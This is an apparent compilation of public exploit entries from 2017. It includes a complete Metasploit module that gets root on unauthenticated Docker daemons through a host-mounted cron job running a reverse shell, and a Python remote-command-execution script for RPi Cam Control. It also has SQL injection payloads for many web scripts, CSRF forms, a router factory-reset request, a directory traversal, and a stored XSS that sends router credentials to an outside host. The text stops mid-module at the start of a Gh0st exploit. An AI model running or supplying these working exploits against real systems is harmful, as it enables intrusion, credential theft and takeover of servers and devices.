##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
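# Docker daemon exposed on a TCP socket without client authentication.
#
# The daemon API is used to create a container that bind-mounts the host's
# "/" and appends a root cron.d entry on the host. The mitigation named in
# the References is to keep dockerd on a unix socket or to require TLS
# client certificates on the TCP listener.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  # Module metadata and options: RPORT (daemon port), DOCKERIMAGE (image the
  # container is created from) and the optional CONTAINER_ID (container name).
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Docker Daemon - Unprotected TCP Socket Exploit',
      'Description' => %q{
        Utilizing Docker via unprotected tcp socket (2375/tcp, maybe 2376/tcp
        with tls but without tls-auth), an attacker can create a Docker
        container with the '/' path mounted with read/write permissions on the
        host server that is running the Docker container. As the Docker
        container executes command as uid 0 it is honored by the host operating
        system allowing the attacker to edit/create files owned by root. This
        exploit abuses this to creates a cron job in the '/etc/cron.d/' path of
        the host server.
        The Docker image should exist on the target system or be a valid image
        from hub.docker.com.
      },
      'Author' => 'Martin Pizala', # started with dcos_marathon module from Erik Daguerre
      'License' => MSF_LICENSE,
      'References' => [
        ['URL', 'https://docs.docker.com/engine/security/security/#docker-daemon-attack-surface'],
        ['URL', 'https://docs.docker.com/engine/reference/commandline/dockerd/#bind-docker-to-another-hostport-or-a-unix-socket']
      ],
      'DisclosureDate' => 'Jul 25, 2017',
      'Targets' => [
        [ 'Python', {
          'Platform' => 'python',
          'Arch' => ARCH_PYTHON,
          'Payload' => {
            'Compat' => {
              'ConnectionType' => 'reverse noconn none tunnel'
            }
          }
        }]
      ],
      'DefaultOptions' => { 'WfsDelay' => 180, 'Payload' => 'python/meterpreter/reverse_tcp' },
      'DefaultTarget' => 0))

    register_options(
      [
        Opt::RPORT(2375),
        OptString.new('DOCKERIMAGE', [ true, 'hub.docker.com image to use', 'python:3-slim' ]),
        OptString.new('CONTAINER_ID', [ false, 'container id you would like'])
      ]
    )
  end

  # Lists the daemon's local images and reports whether +image_id+ occurs in
  # the response body.
  #
  # @param image_id [String] image reference (the DOCKERIMAGE option)
  # @return [Object, nil] the HTTP response when the image is present, nil
  #   when the request failed or the image is not listed
  def check_image(image_id)
    vprint_status("Check if images exist on the target host")
    res = send_request_raw(
      'method' => 'GET',
      'uri' => normalize_uri('images', 'json')
    )
    return unless res && res.code == 200 && res.body.include?(image_id)
    res
  end

  # Asks the daemon to pull +image_id+ from its registry.
  #
  # @param image_id [String] image reference to pull
  # @return [Object, nil] the HTTP response on 200, nil on any other outcome
  #   (including no response at all, which previously raised NoMethodError)
  def pull_image(image_id)
    print_status("Trying to pulling image from docker registry, this may take a while")
    res = send_request_raw(
      'method' => 'POST',
      'uri' => normalize_uri('images', 'create?fromImage=' + image_id)
    )
    return unless res && res.code == 200
    res
  end

  # Container name: CONTAINER_ID when the operator set it, otherwise eight
  # random lowercase letters.
  #
  # @return [String]
  def make_container_id
    return datastore['CONTAINER_ID'] unless datastore['CONTAINER_ID'].nil?
    rand_text_alpha_lower(8)
  end

  # Shell command the container runs: append the payload to +payload_path+
  # and a root cron entry that runs it every minute to +cron_path+, both
  # reached through the host bind mount at +mnt_path+.
  #
  # @param mnt_path [String] container-side mount point of the host's /
  # @param cron_path [String] host path of the cron.d file to create
  # @param payload_path [String] host path the payload is written to
  # @return [String] command string handed to `/bin/sh -c`
  def make_cmd(mnt_path, cron_path, payload_path)
    vprint_status('Creating the docker container command')
    echo_cron_path = mnt_path + cron_path
    echo_payload_path = mnt_path + payload_path
    cron_command = "python #{payload_path}"
    steps = [
      "echo \"#{payload.raw}\" >> #{echo_payload_path}",
      "echo \"PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin\" >> #{echo_cron_path}",
      "echo \"\" >> #{echo_cron_path}",
      "echo \"* * * * * root #{cron_command}\" >> #{echo_cron_path}"
    ]
    steps.join(' && ')
  end

  # Body of the container-create request: the chosen image, the command from
  # make_cmd, and a bind of the host's / at +mnt_path+ — the mount that lets
  # the container's root process write host files.
  #
  # @return [Hash] serialised to JSON by the caller
  def make_container(mnt_path, cron_path, payload_path)
    vprint_status('Setting container json request variables')
    {
      'Image' => datastore['DOCKERIMAGE'],
      'Cmd' => make_cmd(mnt_path, cron_path, payload_path),
      'Entrypoint' => %w[/bin/sh -c],
      'HostConfig' => {
        'Binds' => [
          '/:' + mnt_path
        ]
      }
    }
  end

  # Removes the container. Uses a 1-second timeout; the reply is not inspected.
  #
  # @param container_id [String] container name or id
  def del_container(container_id)
    send_request_raw(
      {
        'method' => 'DELETE',
        'uri' => normalize_uri('containers', container_id)
      },
      1 # timeout
    )
  end

  # Vulnerable when the container list endpoint answers 200 with a Server
  # header mentioning Docker; Unknown when nothing answers; Safe otherwise.
  #
  # @return [Exploit::CheckCode]
  def check
    res = send_request_raw(
      'method' => 'GET',
      'uri' => normalize_uri('containers', 'json'),
      'headers' => { 'Accept' => 'application/json' }
    )
    if res.nil?
      print_error('Failed to connect to the target')
      return Exploit::CheckCode::Unknown
    end
    # A non-Docker listener may omit the Server header; to_s keeps include?
    # from raising on nil.
    if res.code == 200 && res.headers['Server'].to_s.include?('Docker')
      return Exploit::CheckCode::Vulnerable
    end
    Exploit::CheckCode::Safe
  end

  # Creates, starts and waits for the container, then removes it. The cron
  # entry on the host does the rest; the handler waits for it (WfsDelay).
  def exploit
    unless check == Exploit::CheckCode::Vulnerable
      fail_with(Failure::Unknown, 'Target is not reachable or does not look like an unprotected Docker daemon')
    end

    # Use the image if the daemon already has it, otherwise try to pull it.
    image_id = datastore['DOCKERIMAGE']
    if check_image(image_id).nil? && pull_image(image_id).nil?
      fail_with(Failure::Unknown, 'Failed to pull the docker image')
    end

    # Host paths written through the bind mount; registered for cleanup.
    cron_path = '/etc/cron.d/' + rand_text_alpha(8)
    payload_path = '/tmp/' + rand_text_alpha(8)
    mnt_path = '/mnt/' + rand_text_alpha(8)
    container_id = make_container_id

    res_create = send_request_raw(
      'method' => 'POST',
      'uri' => normalize_uri('containers', 'create?name=' + container_id),
      'headers' => { 'Content-Type' => 'application/json' },
      'data' => make_container(mnt_path, cron_path, payload_path).to_json
    )
    fail_with(Failure::Unknown, 'Failed to create the docker container') unless res_create && res_create.code == 201
    print_status("The docker container is created, waiting for deploy")
    register_files_for_cleanup(cron_path, payload_path)

    # Start is fire-and-forget (1-second timeout); completion is observed
    # through the wait endpoint below.
    send_request_raw(
      {
        'method' => 'POST',
        'uri' => normalize_uri('containers', container_id, 'start')
      },
      1 # timeout
    )

    vprint_status("Waiting until the docker container stopped")
    res_wait = send_request_raw(
      'method' => 'POST',
      'uri' => normalize_uri('containers', container_id, 'wait'),
      'headers' => { 'Accept' => 'application/json' }
    )

    # The container is removed on both paths; a missing or non-200 wait
    # response means the command did not complete, so fail instead of
    # waiting for cron.
    if res_wait && res_wait.code == 200
      vprint_status("The docker container has been stopped, now trying to remove it")
      del_container(container_id)
    else
      del_container(container_id)
      fail_with(Failure::Unknown, "The docker container failed to deploy")
    end

    print_status('Waiting for the cron job to run, can take up to 60 seconds')
  end
end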
Title:
====
FiberHome Unauthenticated ADSL Router Factory Reset.
Credit:
======
Name: Ibad Shah
Twitter: @BeeFaauBee09
Website: beefaaubee09.github.io
CVE:
=====
CVE-2017-14147
Date:
====
05-09-2017 (dd/mm/yyyy)
About FiberHome:
======
FiberHome Technologies is a leading equipment vendor and global solution provider in the field of information technology and telecommunications. FiberHome deals in fiber-optic communications, data networking communications, wireless communication, and intelligent applications. In particular, it has been providing end-to-end solutions integrating opto-electronic devices, optical preforms, fiber & cables, and optical communication systems to many countries around the world.
Products & Services:
Wireless 3G/4G broadband devices
Custom engineered technologies
Broadband devices
URL : http://www.fiberhomegroup.com/
Description:
=======
This vulnerability in the AN1020-25 router enables an anonymous, unauthenticated attacker to bypass authentication and reach the factory-reset function, resulting in an unauthorized reset of the router to its factory state. It then allows the attacker to log in to the router's main page with the default username and password.
Affected Device Model:
=============
FiberHome ADSL AN1020-25
Exploitation-Technique:
===================
Remote
Details:
=======
The vulnerability listed below enables an anonymous, unauthenticated attacker to reset the router to its factory settings and then access the router admin page with the default credentials.
1) Bypass authentication and gain unauthorized access vulnerability - CVE-2017-14147
Vulnerable restoreinfo.cgi
Proof Of Concept:
================
PoC :
GET /restoreinfo.cgi HTTP/1.1
Host: 192.168.1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Connection: close
HTTP/1.1 200 Ok
Server: micro_httpd
Cache-Control: no-cache
Date: Sat, 01 Jan 2000 00:12:39 GMT
Content-Type: text/html
Connection: close
<html>
<head>
<meta HTTP-EQUIV='Pragma' CONTENT='no-cache'>
<link rel=stylesheet href='stylemain.css' type='text/css'>
<link rel=stylesheet href='colors.css' type='text/css'>
<script language="javascript">
<!-- hide
function restore() {
var enblPopWin = '0';
var loc = 'main.html';
var code = 'window.top.location="' + loc + '"';
if ( enblPopWin == '1' ) {
loc = 'index.html';
code = 'location="' + loc + '"';
}
eval(code);
}
function frmLoad() {
setTimeout("restore()", 60000);
}
// done hiding -->
</script>
</head>
<body onLoad='frmLoad()'>
<blockquote>
<b>DSL Router Restore</b><br><br>
The DSL Router configuration has been restored to default settings and the
router is rebooting.<br><br>
Close the DSL Router Configuration window and wait for 2 minutes before
reopening your web browser. If necessary, reconfigure your PC's IP address to
match your new configuration.
</blockquote>
</body>
</html>
Credits:
=======
Ibad Shah, Taimooor Zafar, Owais Mehtab
<!--
# # # # #
# Exploit Title: Nimble Professional - Mobile Marketing Text Blast Web Application 1.0 - Cross-Site Request Forgery (Update Admin)
# Dork: N/A
# Date: 11.09.2017
# Vendor Homepage: http://ranksol.com/
# Software Link: http://www.mojomarketplace.com/item/nimble-pro
# Demo: http://demo.ranksol.com/demos/nimble-messaging-bulk-sms-marketing-application-for-business-pro-version/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
#
# Proof of Concept:
-->
<html>
<body>
<label>Edit Profile:</label>
<form method="post" class="form-horizontal" action="http://localhost/[PATH]/ajax.php">
<label>Admin Name:</label>
<input type="text" name="name" style="width: 400px;" value="Admin">
<label>Admin Email:</label>
<input type="text" name="email" style="width: 400px;" value="a@a.com">
<label>Admin Password:</label>
<input type="text" name="pass" style="width: 400px;" value="efe">
<button type="submit" class="btn btn-success" >Save Profile</button>
<input type="hidden" name="cmd" value="save_profile">
</form>
</body>
</html>
<!--
# # # # #
# Exploit Title: jRank - Topsites Script 1.0 - Cross-Site Request Forgery
# Dork: N/A
# Date: 10.09.2017
# Vendor Homepage: https://topsitesscript.com/
# Software Link: https://topsitesscript.com/topsites-script-demo/
# Demo: http://www.topsitesscript.com/demo/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
-->
<form action="http://localhost/[PATH]/admin/headerfooter.php" method="post">
<input name="action" value="edit" type="hidden">
<table width="95%" cellspacing="1" cellpadding="3" border="0" align="center">
<tbody>
<tr bgcolor="#3498DB">
<td><b style="color:#FFFFFF;">Meta Tags File</b></td>
</tr>
<tr bgcolor="#FFFFFF">
<td>
<textarea cols="10" rows="2" name="meta" style="width: 100%">
<!--
Html Code etc.....
-->
</textarea>
</td>
</tr>
</tbody>
</table>
<table width="95%" cellspacing="1" cellpadding="3" border="0" align="center">
<tbody>
<tr bgcolor="#3498DB">
<td><b style="color:#FFFFFF;">Footer File</b></td>
</tr>
<tr bgcolor="#FFFFFF">
<td><textarea cols="60" rows="7" name="footer" style="width: 100%">
<!--
Php Code etc.....
-->
</textarea>
</td>
</tr>
<tr bgcolor="#FFFFFF">
<td>
<font face="verdana" size="2"><center><input name="submit" value="Edit" type="submit"></center></font>
</td>
</tr>
</tbody>
</table>
</form>
# # # # #
# Exploit Title: My Builder Marketplace Script 1.0 - SQL Injection
# Dork: N/A
# Date: 09.09.2017
# Vendor Homepage: http://scriptzee.com/
# Software Link: http://scriptzee.com/best-softwares/my-builder-marketplace
# Demo: http://mybuilderjobs.scriptzee.com/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/marketplace?start_date=[SQL]
#
# Etc..
# # # # #
# # # # #
# Exploit Title: Law Firm Website Script 1.0 - SQL Injection
# Dork: N/A
# Date: 09.09.2017
# Vendor Homepage: http://scriptzee.com/
# Software Link: http://scriptzee.com/small-business/law-firm-website
# Demo: http://lawwebsite.scriptzee.com/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/business-searchlist?country=[SQL]&state=[SQL]&city=[SQL]&farm_cat=[SQL]
#
# Etc..
# # # # #
# # # # #
# Exploit Title: Restaurant Website Script 1.0 - SQL Injection
# Dork: N/A
# Date: 09.09.2017
# Vendor Homepage: http://scriptzee.com/
# Software Link: http://scriptzee.com/small-business/restaurant-website-script
# Demo: http://restaurant.scriptzee.com/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/cms.php?id=[SQL]
#
# -6'++/*!00002UNION*/+/*!00002SELECT*/+0x31,0x32,0x33,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x35,0x36,0x37,0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136,0x3137,0x3138,19,20,0x3231,0x3232--+-
#
# http://localhost/[PATH]/contact.php?id=[SQL]
#
# Etc..
# # # # #
# # # # #
# Exploit Title: Professional Service Booking Software 1.0 - SQL Injection
# Dork: N/A
# Date: 09.09.2017
# Vendor Homepage: http://scriptzee.com/
# Software Link: http://scriptzee.com/best-softwares/professional-service-booking-engine
# Demo: http://professionalservice.scriptzee.com/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/content.php?page=[SQL]
#
# -7+/*!50000UniOn*/+/*!50000SelECt*/+0x496873616e2053656e63616e,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))--+---+-
#
# http://localhost/[PATH]/best_pro_details.php?service_id=[SQL]
#
# -54'++/*!50000UNION*/(/*!50000SELECT*/+0x283129,0x283229,0x283329,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629,0x28323729,0x28323829,0x28323929)--+-
#
# http://localhost/[PATH]/alllikes.php?service_id=[SQL]
#
# Etc..
# # # # #
# # # # #
# Exploit Title: Online Print Business Software 1.0 - SQL Injection
# Dork: N/A
# Date: 09.09.2017
# Vendor Homepage: http://scriptzee.com/
# Software Link: http://scriptzee.com/best-softwares/online-print-business
# Demo: http://onlineprintbssiness.scriptzee.com/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/product-decs.php?cat_id=[SQL]
#
# -149++/*!50000UNION*/(/*!50000SELECT*/+0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x28323729,0x28323829,0x28323929)--+-
#
# http://localhost/[PATH]/info.php?page=[SQL]
#
# Etc..
# # # # #
#####
# Exploit Title: RPi Cam Control <= v6.3.14 (RCE) Multiple Vulnerabilities - preview.php
# Date: 16/08/2017
# Exploit Author: Alexander Korznikov
# Vendor Homepage: https://github.com/silvanmelchior/RPi_Cam_Web_Interface
# Software Link: https://github.com/silvanmelchior/RPi_Cam_Web_Interface
# Version: <= v6.3.14
# Date 16/08/2017
#
# A web interface for the RPi Cam
# Vendor github: https://github.com/silvanmelchior/RPi_Cam_Web_Interface
#
# Bug Discovered by Alexander Korznikov:
# www.exploit-db.com/author/?a=8722
# www.linkedin.com/in/nopernik
# www.korznikov.com
#
# RPi Cam Control <= v6.3.14 is vulnerable to Local File Read and Blind Command Injection.
#
#
# Local File Read (get /etc/passwd file):
# ----------------
# POST /preview.php HTTP/1.1
# Host: 127.0.0.1
# Content-Type: application/x-www-form-urlencoded
# Connection: close
# Content-Length: 80
#
# download1=../../../../../../../../../../../../../../../../etc/passwd.v0000.t
#
#
# Blind Command Injection:
# ------------------
# POST /preview.php HTTP/1.1
# Host: 127.0.0.1
# Content-Type: application/x-www-form-urlencoded
# Connection: close
# Content-Length: 52
#
# convert=none&convertCmd=$(COMMAND_TO_EXECUTE)
#
#
# Blind Command Injection can be combined with Local File Read to retrieve the output of the injected command.
#
# Proof of Concept Code:
#####
#!/usr/bin/python
import requests
import sys
# Both positional arguments (target host, command) are required; print the
# usage line and exit otherwise.
if not len(sys.argv[2:]):
    print "Usage: RPi-Cam-Control-RCE.py 127.0.0.1 'cat /etc/passwd'"
    exit(1)
def GET(target, rfile):
    """Read ``rfile`` from ``target`` via preview.php's ``download1`` parameter.

    The parameter value is a fixed ``../`` prefix, the requested path and the
    ``.v0000.t`` suffix the endpoint expects. Returns the raw response body.
    """
    url = "http://%s/preview.php" % target
    form_headers = {"Content-Type": "application/x-www-form-urlencoded", "Connection": "close"}
    wanted = "../../../../../../../../../../../../../../../../{}.v0000.t".format(rfile)
    reply = requests.post(url, headers=form_headers, data={"download1": wanted})
    return reply.content
def RCE(target, command):
    """Run ``command`` on ``target`` through preview.php's ``convertCmd`` parameter.

    The command's output is redirected to /tmp/output.txt, which is then read
    back with GET() and returned as the function's result.
    """
    url = "http://%s/preview.php" % target
    form_headers = {"Content-Type": "application/x-www-form-urlencoded", "Connection": "close"}
    injected = "$(%s > /tmp/output.txt)" % command
    requests.post(url, headers=form_headers, data={"convert": "none", "convertCmd": injected})
    return GET(target, '/tmp/output.txt')
# Positional arguments: the host, then the command whose output is printed.
target = sys.argv[1]
command = sys.argv[2]
print RCE(target,command)
# # # # #
# Exploit Title: Just Dial Marketplace Software 1.0 - SQL Injection
# Dork: N/A
# Date: 09.09.2017
# Vendor Homepage: http://scriptzee.com/
# Software Link: http://scriptzee.com/best-softwares/just-dial-marketplace
# Demo: http://classified.scriptzee.com/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/result/[SQL]/eFe
# http://localhost/[PATH]/business/[SQL]/eFe
#
# Etc..
# # # # #
# # # # #
# Exploit Title: Job Board Software 1.0 - SQL Injection
# Dork: N/A
# Date: 09.09.2017
# Vendor Homepage: http://scriptzee.com/
# Software Link: http://scriptzee.com/best-softwares/job-board-software
# Demo: http://jobsite.scriptzee.com/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/job-details/[SQL]/eFe
#
# -131'+/*!50000UNION*/(/*!50000SELECT*/+0x283129,0x283229,0x283329,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629,0x28323729,0x28323829,0x28323929,0x28333029,0x28333129,0x28333229,0x28333329,0x28333429,0x28333529,0x28333629,0x28333729,0x28333829,0x28333929,0x28343029,0x28343129,0x28343229)--+-/eFe
#
# Etc..
# # # # #
# # # # #
# Exploit Title: Babysitter Website Script 1.0 - SQL Injection
# Dork: N/A
# Date: 09.09.2017
# Vendor Homepage: http://scriptzee.com/
# Software Link: http://scriptzee.com/best-softwares/babysitter-website
# Demo: http://babysitter.scriptzee.com/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/taskers?skills=[SQL]
#
# 63'AnD+(/*!44455sEleCT*/+0x31+/*!44455FrOM*/+(/*!44455sEleCT*/+cOUNT(*),/*!44455CoNCAt*/((/*!44455sEleCT*/(/*!44455sEleCT*/+/*!44455CoNCAt*/(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!44455FrOM*/+infOrMation_schEma.tables+/*!44455WherE*/+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2))x+/*!44455FrOM*/+infOrMation_schEma.tABLES+/*!44455gROUP*/+bY+x)a)+aND+1=1='
#
# Etc..
# # # # #
# # # # #
# Exploit Title: Escort Website Script 1.0 - SQL Injection
# Dork: N/A
# Date: 09.09.2017
# Vendor Homepage: http://scriptzee.com/
# Software Link: http://scriptzee.com/escort-website
# Demo: http://escortwebsite.scriptzee.com/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/prof_detils.html?escort=[SQL]
#
# -1418820035'+/*!11112UnIoN*/+(/*!11112SelEcT*/0x283129,0x283229,0x283329,0x283429,(Select+export_set(5,@:=0,(/*!11112SelEcT*/+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629)--+-
#
# http://localhost/[PATH]/ajax_rating.php?escort=[SQL]
#
# Etc..
# # # # #
# Exploit Title: XSS persistent on intelbras router with firmware WRN 250
# Date: 07/09/2017
# Exploit Author: Elber Tavares
# Vendor Homepage: http://intelbras.com.br/
# Version: Intelbras Wireless N 150Mbps - WRN 240
# Tested on: kali linux, windows 7, 8.1, 10
# CVE-2017-14219
For more info:
http://whiteboyz.xyz/xss-roteador-intelbras-wrn-240html
URL VULN: http://10.0.0.1/userRpm/popupSiteSurveyRpm.htm
Payload: </script><script src='//elb.me'>
"elb.me contains the malicious code on index"
airbase-ng -e "</script><script src='//elb.me'>" -c 8 -v wlan0mon
// requires a PHP script to collect the logs
PoC:
// Fetches the router's WlanSecurityRpm.htm page with an XHR and forwards a
// slice of the response to a remote endpoint; the handler below runs on
// every readyState change, not only on completion.
var rawFile = new XMLHttpRequest();
rawFile.onreadystatechange = function() {
    alert(rawFile.responseText);
    var base64 = rawFile.responseText.split('>')[1].split("/SCRIPT")[0];
    // selects the part of the page that holds the credentials
    new Image().src="https://elb.me/cookie.php?ck="+btoa(base64);
    // sends the credentials encoded in base64
};
rawFile.open("GET", "http://10.0.0.1/userRpm/WlanSecurityRpm.htm", true);
// fetches the source of the page /popupSiteSurveyRpm.htm
rawFile.send();
# Exploit Title: [Server Directory Traversal at Huawei HG255s]
# Date: [07.09.2017]
# Exploit Author: [Ahmet Mersin]
# Vendor Homepage: [www.huawei.com]
# Software Link: [Not published; this modem is only used in Turkey]
# Version: [V100R001C163B025SP02]
#POC:
https://www.youtube.com/watch?v=n02toTFkLOU&feature=youtu.be
http://192.168.1.1/css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
#You want to follow my activity ?
https://www.linkedin.com/in/ahmet-mersin-177398b0/
@gaissecurity
# # # # #
# Exploit Title: EzInvoice - Invoice Management System 6.0.2 - SQL Injection
# Dork: N/A
# Date: 07.09.2017
# Vendor Homepage: http://www.mysticdreams.net/
# Software Link: http://www.mysticdreams.net/resources/ezinvoice_demo.zip
# Demo: http://www.mysticdreams.net/products/ezinvoice/
# Version: 6.0.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# Sql
# http://localhost/[PATH]/editclient.php?id=[SQL]
# -100+/*!11122UniOn*/+/*!11122SeleCt*/+0x283129,/*!11122CONCAT_WS*/(0x203a20,/*!11122USER*/(),/*!11122DATABASE*/(),VERSION()),0x283329,/*!11122CONCAT_WS*/(0x203a20,/*!11122USER*/(),/*!11122DATABASE*/(),VERSION()),/*!11122CONCAT_WS*/(0x203a20,/*!11122USER*/(),/*!11122DATABASE*/(),VERSION()),/*!11122CONCAT_WS*/(0x203a20,/*!11122USER*/(),/*!11122DATABASE*/(),VERSION())--+-
#
# Bypass
# http://localhost/[PATH]/index.php
# User: 'or 1=1 or ''=' Pass: anything
#
# Backup
# http://localhost/[PATH]/backups/index.php?client_name=admin
#
# Etc...
# # # # #
# # # # #
# Exploit Title: EzBan - Banner Management System 5.3 - SQL Injection
# Dork: N/A
# Date: 07.09.2017
# Vendor Homepage: http://www.mysticdreams.net/
# Software Link: http://www.mysticdreams.net/resources/ezban_demo.zip
# Demo: http://www.mysticdreams.net/products/ezban/
# Version: 5.3
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# Sql
# http://localhost/[PATH]/ezban.php?id=[SQL]&action=show
# 100++aND(/*!00002SelEcT*/+0x30783331+/*!00002frOM*/+(/*!00002SelEcT*/+cOUNT(*),/*!00002cOnCaT*/((/*!00002sELECT*/(/*!00002sELECT*/+/*!00002cOnCaT*/(cAST(dATABASE()+aS+/*!00002cHAR*/),0x7e,0x496873616E53656e63616e))+/*!00002FRoM*/+iNFORMATION_sCHEMA.tABLES+/*!00002wHERE*/+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(/*!00002rAND*/(0)*2))x+/*!00002FRoM*/+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+/*!00002aNd*/+1=1&action=show
#
# Etc...
# # # # #
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'zlib'
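# Buffer overflow in the Gh0st "client" (the operator-side C2 program).
#
# Gh0st frames every message as MAGIC, a little-endian 32-bit total packet
# length, a little-endian 32-bit uncompressed length, then a zlib-deflated
# body whose first byte is the command id.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp

  # Bytes before the compressed body: 5-byte MAGIC plus two 32-bit lengths.
  # The framing code below assumes MAGIC is 5 bytes, as the option says.
  HEADER_SIZE = 13

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Gh0st Client buffer Overflow',
      'Description' => %q{
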